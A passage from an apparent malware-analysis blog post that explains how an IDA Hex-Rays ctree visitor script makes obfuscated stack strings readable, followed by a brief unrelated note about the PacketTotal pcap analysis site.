Our next example is a typical issue when dealing with malware: stack strings. This is a technique aimed to make the analysis harder by using arrays of characters instead of strings in the code. An example can be seen in Figure 5; the malware stores each character’s ASCII value in the stack and then references it in the call to sprintf. At a first glance, it’s very difficult to say what is the meaning of this string (unless of course, you know the ASCII table by heart).


Figure 5: Hex-Rays decompiler output. Stack strings are difficult to read.

Our script will modify these assignments to something more readable. The important part of our code is the ctree visitor mentioned earlier, which is shown in Figure 6.


Figure 6: Custom ctree visitor

The logic implemented here is pretty straightforward. We define our subclass of a ctree visitor (line 1) and override its visit_expr method. This will only kick in when an assignment is found (line 9). Another condition to be met is that the left side of the assignment is a variable and the right side a number (line 15). Moreover, the numeric value must be in the readable ASCII range (lines 20 and 21).

Once this kind of expression is found, we will change the type of the right side from a number to a string (lines 26 to 31), and replace its numerical value by the corresponding ASCII character (line 32).

The modified pseudocode after running this script is shown in Figure 7.


Figure 7: Assigned values shown as characters

You can find the complete scripts in our FLARE GitHub repository under decompiler scripts

Conclusion

These two admittedly simple examples should be able to give you an idea of the power of IDA’s decompiler API. In this post we have covered the foundations of all decompiler scripts: the ctree object, a structure composed by expressions and statements representing every element of the code as well the relationships between them. By creating a custom visitor we have shown how to traverse the tree and read or modify the code elements, therefore analyzing or modifying the pseudocode.

Hopefully, this post will motivate you to start writing your own scripts. This is only the beginning!

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

References

Although written in 2009, one of the best references is still the original article on the Hex-Rays blog.

PacketTotal

The SANS Storm Center did a diary article on PacketTotal, which you can find here. PacketTotal is a (free) site where you upload a pcap (up to 50 Mb) and the site will analyze it and give you an console view that includes malicious or suspicious activity as well as a break out of http, dns and other protocols. It will also give you a nice timeline graph showing the packets as they interact, which is really nice.  Lastly, you get an analytics page if you like graphs showing the breakout of stats on the traffic. You can find it at, yes, packettotal.com.